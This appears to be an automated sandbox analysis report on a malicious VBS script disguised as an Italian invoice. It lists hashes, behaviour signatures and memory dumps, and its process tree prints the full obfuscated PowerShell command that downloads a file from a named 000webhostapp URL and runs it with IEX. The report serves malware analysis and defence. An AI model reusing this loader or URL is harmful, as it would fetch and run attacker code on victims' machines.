Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    18-10-2021 11:24

General

  • Target

    FATTURA_46082_ELEPHANTSCAVI-scan.vbs

  • Size

    4KB

  • MD5

    dfeab6c2910012eba15a7b4dc56b80f5

  • SHA1

    262560445a9f351cc2a1535fbf6857a9eb1eef0e

  • SHA256

    6db5f541f73470c314a570b21d90f78e91af21bbf5851660118566ffca9a1140

  • SHA512

    e2776b36a4cbad55ece79090352d03d097017b867dc4459d53ffdc2ca50ccff18223fc4248896875368eedf6cd372cfed83e32358a3a7b979730c4ffe0549a26

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://hkuakdsjkjkhdskdskjkdskdsj.000webhostapp.com/bypass.txt

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FATTURA_46082_ELEPHANTSCAVI-scan.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H = 'https://hkuakdsjkjkhdskdskjkdskdsj.000webhostapp.com/bypass.txt';$RGDTHFYJGUKHILJO = '24-Fx-48-Fx-31-Fx-20-Fx-3d-Fx-20-Fx-27-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-27-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-41-Fx-27-Fx-2c-Fx-27-Fx-6e-Fx-27-Fx-29-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-42-Fx-27-Fx-2c-Fx-27-Fx-45-Fx-27-Fx-29-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-43-Fx-27-Fx-2c-Fx-27-Fx-74-Fx-27-Fx-29-Fx-3b-Fx-24-Fx-48-Fx-32-Fx-20-Fx-3d-Fx-20-Fx-27-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-27-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-44-Fx-27-Fx-2c-Fx-27-Fx-2e-Fx-27-Fx-29-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-45-Fx-27-Fx-2c-Fx-27-Fx-57-Fx-27-Fx-29-Fx-3b-Fx-24-Fx-48-Fx-34-Fx-20-Fx-3d-Fx-20-Fx-27-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-4e-Fx-54-Fx-27-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-4e-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-54-Fx-27-Fx-2c-Fx-27-Fx-49-Fx-45-Fx-27-Fx-29-Fx-3b-Fx-24-Fx-48-Fx-33-Fx-20-Fx-3d-Fx-20-Fx-27-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-27-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-4c-Fx-27-Fx-2c-Fx-27-Fx-62-Fx-43-Fx-27-Fx-29-Fx-3b-Fx-24-Fx-48-Fx-48-Fx-20-Fx-3d-Fx-20-Fx-24-Fx-48-Fx-31-Fx-2b-Fx-24-Fx-48-Fx-32-Fx-2b-Fx-24-Fx-48-Fx-33-Fx-2b-Fx-24-Fx-48-Fx-34-Fx-3b-Fx-24-Fx-48-Fx-48-Fx-48-Fx-20-Fx-3d-Fx-20-Fx-27-Fx-44-Fx-4f-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-6e-Fx-47-Fx-27-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-27-Fx-2c-Fx-27-Fx-57-Fx-6e-Fx-4c-Fx-6f-Fx-61-Fx-44-Fx-53-Fx-54-Fx-72-Fx-49-Fx-27-Fx-29-Fx-3b-Fx-24-Fx-48-Fx-48-Fx-48-Fx-48-Fx-20-Fx-3d-Fx-27-Fx-49-Fx-60-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-45-Fx-63-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-48-Fx-29-Fx-2e-Fx-24-Fx-48-Fx-48-Fx-48-Fx-28-Fx-24-Fx-48-Fx-29-Fx-27-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-60-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-2d-Fx-27-Fx-2c-Fx-27-Fx-45-Fx-58-Fx-28-Fx-6e-Fx-65-Fx-60-Fx-57-Fx-60-Fx-2d-Fx-4f-Fx-62-Fx-6a-Fx-60-Fx-27-Fx-29-Fx-2e-Fx-52-Fx-65-Fx-70-Fx-6c-Fx-61-Fx-63-Fx-65-Fx-28-Fx-27-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-2b-Fx-27-Fx-2c-Fx-27-Fx-60-Fx-54-Fx-20-Fx-24-Fx-48-Fx-27-Fx-29-Fx-3b-Fx-26-Fx-28-Fx-27-Fx-49-Fx-27-Fx-2b-Fx-27-Fx-45-Fx-58-Fx-27-Fx-29-Fx-28-Fx-24-Fx-48-Fx-48-Fx-48-Fx-48-Fx-20-Fx-2d-Fx-4a-Fx-6f-Fx-69-Fx-6e-Fx-20-Fx-27-Fx-27-Fx-29-Fx-7c-Fx-26-Fx-28-Fx-27-Fx-49-Fx-27-Fx-2b-Fx-27-Fx-45-Fx-58-Fx-27-Fx-29-Fx-';$STRDYUGHIJFESRGFTHYG = $RGDTHFYJGUKHILJO -split '-Fx-' |ForEach-Object {[char][convert]::ToUInt32($_,16) };$RDTFYGUIHJODRGFHTGYJH = $STRDYUGHIJFESRGFTHYG -join '';$AA = 'In#@##$#$#$#$#$#$#$#$$###$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ess'.Replace('#@##$#$#$#$#$#$#$#$$###$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@','voke-Expr') ; $BB= 'ion $R<<<<<>>>>>>H'.Replace('<<<<<>>>>>>','DTFYGUI');$CC='J<<<<<<<>.......JH'.Replace('<<<<<<<>.......','ODRGFHTGY');I`E`X ($AA , $BB , $CC -Join '')|I`E`X;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1648

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1640-54-0x000007FEFC061000-0x000007FEFC063000-memory.dmp

    Filesize

    8KB

  • memory/1648-55-0x0000000000000000-mapping.dmp

  • memory/1648-57-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

    Filesize

    11.4MB

  • memory/1648-58-0x0000000002850000-0x0000000002852000-memory.dmp

    Filesize

    8KB

  • memory/1648-59-0x0000000002852000-0x0000000002854000-memory.dmp

    Filesize

    8KB

  • memory/1648-60-0x0000000002854000-0x0000000002857000-memory.dmp

    Filesize

    12KB

  • memory/1648-61-0x000000000285B000-0x000000000287A000-memory.dmp

    Filesize

    124KB